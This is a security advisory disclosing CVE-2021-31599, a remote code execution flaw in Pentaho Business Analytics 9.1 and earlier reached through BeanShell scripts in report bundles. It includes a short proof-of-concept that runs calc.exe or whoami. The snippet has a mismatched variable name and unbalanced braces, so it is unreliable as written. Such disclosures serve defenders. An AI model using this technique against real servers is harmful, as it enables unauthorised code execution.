Pentaho Business Analytics / Pentaho Business Server 9.1 Remote Code Execution

`Product: Pentaho Business Analytics / Pentaho Business Server  
Vendor / Manufacturer: Hitachi  
Affected Version(s): <= 9.1  
Vulnerability Type: Remote Code Execution through Pentaho Report Bundles  
Solution Status: Fix Released on public GitHub repository  
Manufacturer Notification: 8th February 2021  
Solution Date: May 2021  
Public Disclosure: 01 November 2021  
CVE Reference: CVE-2021-31599  
Author(s) of Advisory: Alberto Favero ( HawSec ) & Altion Malka  
  
--- ### --- ### ---  
  
Product Description:  
  
Pentaho is business intelligence (BI) software that provides data  
integration, OLAP services, reporting, information dashboards, data mining  
and extract, transform, load (ETL) capabilities. Its headquarters are in  
Orlando, Florida. Pentaho was acquired by Hitachi Data Systems in 2015 and  
in 2017 became part of Hitachi Vantara.  
  
( Source: https://en.wikipedia.org/wiki/Pentaho )  
  
--- ### --- ### ---  
  
Vulnerability Details:  
  
Pentaho allows users to create and run Pentaho Report Bundles (.prpt).  
Users can create PRPT reports by utilizing the Pentaho Designer application  
and can include BeanShell Script functions to ease the production of  
complex reports. However, the BeanShell Script functions can allow  
for the execution of arbitrary Java code when Pentaho PRPT Reports are run  
by Pentaho Business Analytics. This functionality allows any user with  
sufficient privileges to upload or edit an existing Pentaho Report Bundle  
(through Pentaho Designer) and execute arbitrary code in the  
context of the Pentaho application user running on the web server.  
  
The following proof-of-concept BeanShell Expression demonstrates Remote  
Code Execution on the underlying host server of the Pentaho application.  
  
--- ~~~ --- ~~~ ---  
// BeanShell Expression  
getValue() {  
// Detect the underlying Operating System  
boolean isWindowsOS = System.getProperty("os.name  
").toLowerCase().startsWith("windows");  
if (isWindows) {  
// Spawning Windows Calculator App  
Runtime.getRuntime().exec("calc.exe");  
} else {  
// Executing the Linux ‘whoami’ command  
Runtime.getRuntime().exec("whoami");  
}  
}  
// Returns the string “done” When the PRPT report is executed  
return ("Done!");  
}  
--- ~~~ --- ~~~ ---  
  
--- ### --- ### ---  
  
Proof of Concept (PoC):  
  
See Ginger ( https://github.com/HawSec/ginger ) or the attaced PRPT file  
  
--- ### --- ### ---  
  
References:  
  
- https://beanshell.github.io/intro.html  
-  
https://javadoc.pentaho.com/reporting/pentaho-reporting-engine-classic-core/org/pentaho/reporting/engine/classic/core/modules/misc/beanshell/BSHExpression.html#getValue()  
  
--- ### --- ### ---  
  
  
Credits:  
  
This vulnerability was discovered by Alberto Favero & Altion Malka  
  
--- ### --- ### ---  
  
  
--   
BlackHawk - [email protected]  
  
Experientia senum, agilitas iuvenum.  
Adversa fortiter. Dubia prudenter.  
`